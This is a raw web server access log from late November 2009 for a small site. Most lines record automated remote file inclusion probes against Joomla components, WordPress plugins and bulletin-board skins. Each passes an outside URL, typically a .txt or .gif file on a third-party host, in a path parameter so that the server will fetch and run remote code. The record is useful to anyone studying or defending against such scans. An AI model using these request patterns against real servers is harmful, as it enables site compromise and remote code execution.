75.126.127.34 - - [30/Nov/2009:04:37:49 -0800] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.115.152 - - [30/Nov/2009:04:39:51 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.115.152 - - [30/Nov/2009:04:39:52 -0800] "GET /labia/?M=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
118.217.5.166 - - [30/Nov/2009:04:40:02 -0800] "GET /logs/access_091005.log///skin/dognara_gallery/setup.php?dir=http://www.seolbong.es.kr/bbs/.../com_sef/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [30/Nov/2009:04:40:02 -0800] "GET /logs///skin/dognara_gallery/setup.php?dir=http://www.seolbong.es.kr/bbs/.../com_sef/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.217.5.166 - - [30/Nov/2009:04:40:02 -0800] "GET //skin/dognara_gallery/setup.php?dir=http://www.seolbong.es.kr/bbs/.../com_sef/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [30/Nov/2009:04:41:18 -0800] "GET /include/mail.lib.inc.php?site_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [30/Nov/2009:04:41:18 -0800] "GET /logs//include/mail.lib.inc.php?site_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [30/Nov/2009:04:41:18 -0800] "GET /logs/access_090511.log//include/mail.lib.inc.php?site_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [30/Nov/2009:04:41:44 -0800] "GET /include/mail.lib.inc.php?site_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [30/Nov/2009:04:41:44 -0800] "GET /logs//include/mail.lib.inc.php?site_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [30/Nov/2009:04:41:44 -0800] "GET /logs/access_090511.log//include/mail.lib.inc.php?site_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [30/Nov/2009:04:41:59 -0800] "GET /logs/access_090608.log//include/mail.lib.inc.php?site_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:42:22 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:42:22 -0800] "GET /logs/access_090713.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:42:22 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:42:23 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:42:23 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:42:24 -0800] "GET /logs/access_090713.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.181.60 - - [30/Nov/2009:04:42:32 -0800] "GET /logs/access_090608.log//include/mail.lib.inc.php?site_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:43:30 -0800] "GET /logs/access_090713.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:43:30 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:43:30 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:43:42 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:43:43 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:04:43:43 -0800] "GET /logs/access_090713.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:04:44:00 -0800] "GET /logs/access_090518.log/?sourcedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:04:44:01 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.200.255.18 - - [30/Nov/2009:04:44:29 -0800] "GET /logs/access_090518.log/?sourcedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:04:44:33 -0800] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:04:44:40 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:04:45:02 -0800] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.108 - - [30/Nov/2009:04:45:44 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.106.108 - - [30/Nov/2009:04:46:28 -0800] "GET /labia/?S=A HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
67.195.115.152 - - [30/Nov/2009:04:49:35 -0800] "GET /cendoc/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
64.120.76.58 - - [30/Nov/2009:04:49:43 -0800] "GET /logs/access.log//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://slbbalikpapan.net/images/mic22.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "galf.org"
64.120.76.58 - - [30/Nov/2009:04:49:43 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://slbbalikpapan.net/images/mic22.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "galf.org"
64.120.76.58 - - [30/Nov/2009:04:49:43 -0800] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://slbbalikpapan.net/images/mic22.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "galf.org"
203.130.198.40 - - [30/Nov/2009:04:53:42 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.130.198.40 - - [30/Nov/2009:04:53:42 -0800] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.130.198.40 - - [30/Nov/2009:04:53:49 -0800] "GET /logs/access.log%20%20//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.66.28.36 - - [30/Nov/2009:04:53:54 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.66.28.36 - - [30/Nov/2009:04:53:54 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.66.28.36 - - [30/Nov/2009:04:53:59 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.203.109 - - [30/Nov/2009:04:54:54 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [30/Nov/2009:04:54:54 -0800] "GET /?sourcedir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [30/Nov/2009:04:54:55 -0800] "GET /logs/?sourcedir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
124.217.242.210 - - [30/Nov/2009:04:55:09 -0800] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
124.217.242.210 - - [30/Nov/2009:04:55:09 -0800] "GET /logs/access.log%20%20//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
124.217.242.210 - - [30/Nov/2009:04:55:12 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
193.200.255.18 - - [30/Nov/2009:04:55:28 -0800] "GET /logs/access.log/?sourcedir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.66.28.36 - - [30/Nov/2009:04:56:27 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.66.28.36 - - [30/Nov/2009:04:56:27 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
61.66.28.36 - - [30/Nov/2009:04:56:27 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://ikant.co.kr/data/v5.4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [30/Nov/2009:04:57:59 -0800] "GET //skin/ggambo7002_board//modify.php?dir=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [30/Nov/2009:04:57:59 -0800] "GET /logs///skin/ggambo7002_board//modify.php?dir=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [30/Nov/2009:04:57:59 -0800] "GET /logs/access.log%20%20///skin/ggambo7002_board//modify.php?dir=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [30/Nov/2009:04:59:14 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:04:59:14 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [30/Nov/2009:04:59:14 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [30/Nov/2009:05:02:51 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [30/Nov/2009:05:03:23 -0800] "GET /logs/access_090615.log/?sourcedir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:04:17 -0800] "GET //skin/ggambo7002_board//modify.php?dir=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:04:18 -0800] "GET /logs///skin/ggambo7002_board//modify.php?dir=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:04:22 -0800] "GET /logs/access_090928.log///skin/ggambo7002_board//modify.php?dir=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:05:39 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:05:55 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:05:55 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:05:06:05 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:05:06:05 -0800] "GET /logs/access_090831.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:05:06:05 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:05:06:05 -0800] "GET /logs/access_090525.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:05:06:33 -0800] "GET /logs/access_090831.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:05:06:33 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:05:06:33 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.126.127.34 - - [30/Nov/2009:05:06:36 -0800] "GET /logs/access_090525.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:07:34 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [30/Nov/2009:05:07:36 -0800] "GET /modules/My_eGallery/index.php?basepath=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [30/Nov/2009:05:07:36 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [30/Nov/2009:05:07:36 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [30/Nov/2009:05:07:37 -0800] "GET /logs/access.log%20%20/modules/My_eGallery/index.php?basepath=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.216.203.109 - - [30/Nov/2009:05:07:58 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:08:07 -0800] "GET /modules/My_eGallery/index.php?basepath=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [30/Nov/2009:05:08:07 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [30/Nov/2009:05:08:10 -0800] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.22.119.110 - - [30/Nov/2009:05:09:07 -0800] "GET /logs/access_090622.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:05:09:07 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:05:09:07 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:05:09:22 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:05:09:22 -0800] "GET /logs/access_090622.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:05:09:23 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [30/Nov/2009:05:10:37 -0800] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.22.119.110 - - [30/Nov/2009:05:10:37 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.22.119.110 - - [30/Nov/2009:05:10:37 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.22.119.110 - - [30/Nov/2009:05:10:52 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.22.119.110 - - [30/Nov/2009:05:10:52 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kelapa.fileave.com/a.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.22.119.110 - - [30/Nov/2009:05:10:52 -0800] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://kelapa.fileave.com/a.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
210.127.209.27 - - [30/Nov/2009:05:10:55 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:05:10:55 -0800] "GET /logs/access_090427.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:05:10:55 -0800] "GET /logs/access_090713.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.127.209.27 - - [30/Nov/2009:05:10:55 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:11:19 -0800] "GET /logs/access_090525.log%20%20/config.php?path_to_root=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:11:20 -0800] "GET /config.php?path_to_root=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:11:22 -0800] "GET /logs/config.php?path_to_root=http://4pppp.com/images/img1.gif?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:11:24 -0800] "GET /logs/access_090525.log%20%20/config.php?path_to_root=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:11:29 -0800] "GET /config.php?path_to_root=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:11:31 -0800] "GET /config.php?path_to_root=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:11:31 -0800] "GET /logs/config.php?path_to_root=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:11:31 -0800] "GET /config.php?path_to_root=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:11:32 -0800] "GET /logs/config.php?path_to_root=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:11:34 -0800] "GET /logs/access_090525.log/config.php?path_to_root=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:11:34 -0800] "GET /logs/access_090525.log/config.php?path_to_root=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:11:37 -0800] "GET /logs/config.php?path_to_root=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.203.109 - - [30/Nov/2009:05:11:53 -0800] "GET /logs/access_090518.log/?sourcedir=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:11:54 -0800] "GET /logs/access_090831.log%20%20/config.php?path_to_root=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:11:58 -0800] "GET /logs/access_090831.log/config.php?path_to_root=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:11:59 -0800] "GET /logs/access_090831.log/config.php?path_to_root=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:12:17 -0800] "GET /logs/access_090831.log%20%20/config.php?path_to_root=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.186.11.35 - - [30/Nov/2009:05:15:02 -0800] "GET /logs/access_091102.log//components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.186.11.35 - - [30/Nov/2009:05:15:02 -0800] "GET /logs//components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
91.186.11.35 - - [30/Nov/2009:05:15:02 -0800] "GET /components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://stelsis.ru/clx/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:15:15 -0800] "GET /logs/config.php?path_to_root=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [30/Nov/2009:05:15:16 -0800] "GET /logs/access_090615.log/config.php?path_to_root=http://4pppp.com/images/img1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
